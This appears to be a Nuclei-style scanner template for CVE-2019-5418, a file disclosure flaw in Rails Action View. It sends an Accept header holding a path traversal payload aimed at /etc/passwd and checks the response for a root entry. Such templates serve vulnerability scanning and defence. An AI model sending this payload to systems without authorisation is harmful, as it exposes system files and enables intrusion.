id: CVE-2019-5418 info: name: File Content Disclosure on Rails author: omarkurt severity: medium description: There is a File Content Disclosure vulnerability in Action View <5.2.2.1, <5.1.6.2, <5.0.7.2, <4.2.11.1 and v3 where specially crafted accept headers can cause contents of arbitrary files on the target system's filesystem to be exposed. reference: | - https://github.com/omarkurt/CVE-2019-5418 - https://weblog.rubyonrails.org/2019/3/13/Rails-4-2-5-1-5-1-6-2-have-been-released/ tags: cve,cve2019,rails,lfi requests: - method: GET path: - "{{BaseURL}}" headers: Accept: ../../../../../../../../etc/passwd{{ matchers-condition: and matchers: - type: status status: - 200 - type: regex regex: - "root:[x*]:0:0:" part: body